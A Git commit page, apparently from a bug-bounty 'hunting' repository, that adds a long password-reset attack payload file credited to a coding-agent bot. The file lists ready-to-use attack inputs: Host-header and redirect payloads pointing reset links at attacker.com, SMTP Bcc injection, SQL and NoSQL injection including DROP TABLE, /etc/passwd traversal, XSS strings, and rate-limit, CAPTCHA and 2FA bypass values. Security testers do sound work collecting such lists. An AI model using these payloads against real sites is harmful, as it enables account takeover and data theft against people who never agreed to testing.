0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add comprehensive password reset vulnerability payloads and PoC documentation

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 15:32:01 +00:00
parent 79f39287b7
commit 2c30b71106
5 changed files with 1062 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Password-Reset/password-reset-payloads.txt
+590
View File
@@ -0,0 +1,590 @@
# Password Reset Vulnerability Payloads
# ============================================
# 1. HOST HEADER INJECTION PAYLOADS
# ============================================
# Basic host header manipulation
Host: attacker.com
Host: evil.com
Host: attacker.com:80
Host: localhost
# X-Forwarded headers
X-Forwarded-Host: attacker.com
X-Forwarded-Host: evil.com
X-Forwarded-Server: attacker.com
X-Host: attacker.com
X-Forwarded-For: attacker.com
# Absolute URL in Host header
Host: https://attacker.com
Host: http://evil.com/reset
# Host header with port manipulation
Host: example.com:@attacker.com
Host: example.com@attacker.com
Host: example.com%00.attacker.com
Host: example.com%0d%0aHost:%20attacker.com
# Multiple host headers
Host: example.com
Host: attacker.com
# Host header with path
Host: example.com/reset
Host: attacker.com/../example.com
# ============================================
# 2. PARAMETER POLLUTION PAYLOADS
# ============================================
# Multiple email parameters
email=victim@example.com&email=attacker@example.com
email[]=victim@example.com&email[]=attacker@example.com
email=victim@example.com,attacker@example.com
email=victim@example.com%20attacker@example.com
email=victim@example.com|attacker@example.com
email=victim@example.com;attacker@example.com
# Email with CC/BCC injection
email=victim@example.com%0Acc:attacker@example.com
email=victim@example.com%0Abcc:attacker@example.com
email=victim@example.com%0D%0ACC:attacker@example.com
email=victim@example.com%0d%0aBcc:attacker@example.com
# JSON array pollution
{"email": ["victim@example.com", "attacker@example.com"]}
{"email": "victim@example.com", "email": "attacker@example.com"}
# Multiple parameters with different names
email=victim@example.com&mail=attacker@example.com
email=victim@example.com&username=attacker
to=victim@example.com&cc=attacker@example.com
# ============================================
# 3. TOKEN MANIPULATION PAYLOADS
# ============================================
# Empty token
token=
token=%20
token=null
token=undefined
token=0
# Boolean bypass
token=true
token=false
token=1
token=0
# Array manipulation
token[]=valid_token
token[]=
token[0]=valid_token
# SQL injection in token
token=' OR '1'='1
token=1' OR '1'='1'--
token=' OR 1=1--
token=admin'--
token='; DROP TABLE tokens;--
# NoSQL injection in token
{"token": {"$gt": ""}}
{"token": {"$ne": null}}
{"token": {"$regex": ".*"}}
# Path traversal in token
token=../../../../../../etc/passwd
token=....//....//....//etc/passwd
token=..%2F..%2F..%2Fetc%2Fpasswd
# Token with special characters
token=<script>alert(1)</script>
token=javascript:alert(1)
token=%00
token=%0d%0a
# Wildcard token
token=*
token=%
token=.*
token=.+
# ============================================
# 4. USER IDENTIFIER MANIPULATION (IDOR)
# ============================================
# User ID manipulation
user_id=1
user_id=2
user_id=admin
user_id=0
user_id=-1
user_id=999999
# Username manipulation
username=admin
username=administrator
username=root
username=victim
# Email manipulation
email=admin@example.com
email=admin@localhost
email=root@localhost
# UUID manipulation
user_uuid=00000000-0000-0000-0000-000000000001
user_uuid=11111111-1111-1111-1111-111111111111
# Account ID variations
account_id=1&user_id=2
uid=admin
user=admin
# ============================================
# 5. RATE LIMITING BYPASS PAYLOADS
# ============================================
# IP header spoofing
X-Forwarded-For: 1.2.3.4
X-Forwarded-For: 127.0.0.1
X-Real-IP: 1.2.3.4
X-Originating-IP: 1.2.3.4
X-Remote-IP: 1.2.3.4
X-Remote-Addr: 1.2.3.4
X-Client-IP: 1.2.3.4
# Randomized IPs for each request
X-Forwarded-For: <random_ip>
X-Real-IP: 192.168.1.<1-255>
# Multiple IP headers
X-Forwarded-For: 1.1.1.1, 2.2.2.2, 3.3.3.3
X-Forwarded-For: 127.0.0.1
X-Real-IP: 192.168.1.1
# Session manipulation
session_id=<different_session_each_request>
PHPSESSID=<random_session>
# User agent rotation
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
# ============================================
# 6. WEAK TOKEN PATTERNS TO BRUTE FORCE
# ============================================
# 4-digit numeric codes
0000
0001
0002
...
9999
# 6-digit numeric codes (common OTP length)
000000
000001
...
999999
# Sequential tokens
token_1
token_2
token_3
# Timestamp-based tokens (Unix timestamp)
1609459200
1609459201
1609459202
# MD5 of simple inputs
5f4dcc3b5aa765d61d8327deb882cf99 (md5 of "password")
e10adc3949ba59abbe56e057f20f883e (md5 of "123456")
# Short alphanumeric (low entropy)
aaa
aab
aac
...
zzz
# Base64 encoded simple strings
YWRtaW4= (admin)
dGVzdA== (test)
MTIzNDU2 (123456)
# ============================================
# 7. RESPONSE MANIPULATION PAYLOADS
# ============================================
# These are used in client-side manipulation
{"valid": false} -> {"valid": true}
{"authenticated": false} -> {"authenticated": true}
{"error": "Invalid token"} -> {"success": "Token valid"}
{"status": 401} -> {"status": 200}
{"token_valid": false} -> {"token_valid": true}
# ============================================
# 8. ACCOUNT ENUMERATION PAYLOADS
# ============================================
# Valid vs invalid email testing
email=admin@example.com
email=administrator@example.com
email=test@example.com
email=nonexistent@example.com
email=invalid@invalid.invalid
# Username enumeration
username=admin
username=administrator
username=root
username=test
username=user
username=demo
username=guest
# Email format variations
email=admin
email=admin@
email=@example.com
email=admin@@example.com
email=admin@.com
# ============================================
# 9. EMAIL INJECTION PAYLOADS
# ============================================
# SMTP header injection
email=victim@example.com%0D%0ATo:attacker@evil.com
email=victim@example.com%0ABcc:attacker@evil.com
email=victim@example.com%0ASubject:Malicious
# Email with newline injection
email=victim@example.com%0A%0AAttacker content
email=victim@example.com\r\nBcc:attacker@evil.com
email=victim@example.com\nTo:attacker@evil.com
# Multiple recipients
email=victim@example.com,attacker@evil.com
email=victim@example.com;attacker@evil.com
email="victim@example.com, attacker@evil.com"
# ============================================
# 10. CRYPTO ANALYSIS PAYLOADS
# ============================================
# Test for weak encryption/encoding
token=base64_decode_this
token=rot13_this
token=hex_decode_this
# Known weak hashes to test
token=d41d8cd98f00b204e9800998ecf8427e (MD5 of empty string)
token=5d41402abc4b2a76b9719d911017c592 (MD5 of "hello")
# ============================================
# 11. TIME-BASED TESTING PAYLOADS
# ============================================
# Future timestamps
valid_until=9999999999
expires_at=2099-12-31
expiry=9999999999999
# Past timestamps (should be invalid)
timestamp=0
timestamp=1
created_at=1970-01-01
# ============================================
# 12. WORKFLOW BYPASS PAYLOADS
# ============================================
# Skip verification step
verified=true
email_verified=true
skip_verification=true
bypass=true
# Status manipulation
status=completed
status=verified
status=approved
password_reset_completed=true
# Step manipulation
step=1
step=3
skip_step=2
current_step=final
# ============================================
# 13. API-SPECIFIC PAYLOADS
# ============================================
# GraphQL mutations
{"query":"mutation{resetPassword(email:\"victim@example.com\"){success}}"}
{"query":"mutation{resetPassword(email:\"admin@example.com\",token:\""){success}}"}
# REST API variations
PUT /api/v1/users/1/password
PATCH /api/v1/password/reset
POST /api/reset
POST /api/v2/auth/forgot-password
# ============================================
# 14. SPECIAL CHARACTERS & ENCODING
# ============================================
# URL encoding
email=victim%40example.com
email=victim%2540example.com (double encoding)
# Unicode characters
email=victim@еxample.com (Cyrillic 'e')
email=admin@example.com
# Null bytes
email=victim@example.com%00
email=victim@example.com%00.attacker.com
token=valid_token%00
# HTML encoding
email=victim&#64;example.com
email=victim&commat;example.com
# ============================================
# 15. BUSINESS LOGIC BYPASS
# ============================================
# Negative values
user_id=-1
token_attempts=-1
rate_limit=-1
# Very large numbers
user_id=999999999
user_id=2147483647
user_id=9999999999999999999
# Array manipulation
user_id[]=1
user_id[]=2
emails[]=victim@example.com
# Type juggling
user_id="1"
user_id=1
user_id=true
user_id=null
# ============================================
# 16. CASE SENSITIVITY BYPASS
# ============================================
email=ADMIN@EXAMPLE.COM
email=Admin@Example.Com
username=ADMIN
username=AdMiN
token=ABCDEF
token=AbCdEf
# ============================================
# 17. LINK MANIPULATION
# ============================================
# Redirect after reset
redirect_url=https://attacker.com
return_url=https://evil.com
next=https://attacker.com/capture
callback=https://evil.com
# Open redirect in reset flow
redirect=//attacker.com
redirect=///attacker.com
redirect=/\/\attacker.com
redirect=//google.com@attacker.com
# ============================================
# 18. CORS & ORIGIN MANIPULATION
# ============================================
Origin: https://attacker.com
Origin: null
Referer: https://attacker.com/reset
Access-Control-Allow-Origin: *
# ============================================
# 19. RACE CONDITION PAYLOADS
# ============================================
# Send simultaneous requests
# Multiple threads requesting:
POST /reset-password with same token
POST /forgot-password for same email
POST /verify-token with same token
# ============================================
# 20. VERBOSE ERROR MESSAGES
# ============================================
# Test different invalid inputs to enumerate:
email=nonexistent@example.com
# Expected: "Email not found" (reveals valid emails)
token=invalid
# Expected: "Invalid token" vs "Expired token" (information disclosure)
user_id=9999
# Expected: "User does not exist" (user enumeration)
# ============================================
# 21. CAPTCHA BYPASS
# ============================================
captcha=
g-recaptcha-response=
h-captcha-response=
recaptcha_token=null
captcha_token=
skip_captcha=true
# ============================================
# 22. TWO-FACTOR BYPASS VIA PASSWORD RESET
# ============================================
# Test if password reset bypasses 2FA
skip_2fa=true
bypass_2fa=true
2fa_enabled=false
require_otp=false
mfa_required=false
# ============================================
# 23. PASSWORD CONFIRMATION BYPASS
# ============================================
# Missing confirmation field
new_password=NewPass123
# (without confirm_password field)
# Mismatched passwords
new_password=NewPass123
confirm_password=DifferentPass456
# Empty confirmation
new_password=NewPass123
confirm_password=
# ============================================
# 24. WEAK PASSWORD ALLOWED
# ============================================
# Test if weak passwords are accepted in reset
new_password=123
new_password=password
new_password=admin
new_password=123456
new_password=12345678
new_password=qwerty
new_password=abc123
# ============================================
# 25. SESSION FIXATION
# ============================================
# Set session before reset
Cookie: session_id=attacker_controlled_value
PHPSESSID=attacker_session
# After victim resets password with this session,
# attacker can use the session to access account
# ============================================
# 26. HTTP METHOD TAMPERING
# ============================================
# Try different HTTP methods on reset endpoint
GET /api/reset-password?token=abc&password=new
PUT /api/reset-password
DELETE /reset-password
PATCH /reset-password
HEAD /reset-password
OPTIONS /reset-password
# ============================================
# 27. CONTENT-TYPE MANIPULATION
# ============================================
Content-Type: application/json
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data
Content-Type: text/plain
Content-Type: application/xml
# ============================================
# 28. PASSWORD IN RESPONSE
# ============================================
# Check if new password is returned in response
# After setting: new_password=SecretPass123
# Response should NOT contain:
{"password": "SecretPass123"}
{"new_password": "SecretPass123"}
# ============================================
# 29. NO CONFIRMATION EMAIL
# ============================================
# Test if user is notified after password reset
# User should receive confirmation that password was changed
# If not, attacker can silently reset passwords
# ============================================
# 30. TEMPORAL ATTACKS
# ============================================
# Timing attack to enumerate users
# Measure response time difference:
email=valid@example.com (slower response)
email=invalid@example.com (faster response)
# ============================================
# TEST SCENARIOS
# ============================================
# Scenario 1: Reset without current password
POST /change-password
new_password=NewPassword123
# Should require old_password field
# Scenario 2: Token reuse
1. Get token: /forgot-password?email=test@example.com
2. Use token: /reset?token=abc123&password=new1
3. Try token again: /reset?token=abc123&password=new2
# Second attempt should fail
# Scenario 3: Expired token
1. Get token
2. Wait > expiration time
3. Try to use expired token
# Should be rejected
# Scenario 4: Token for different user
1. Request reset for user A
2. Get token for user A
3. Try to use it for user B
# Should be rejected
# Scenario 5: Multiple active tokens
1. Request reset (get token1)
2. Request reset again (get token2)
3. Use token1
# token1 should still work, or only latest token should work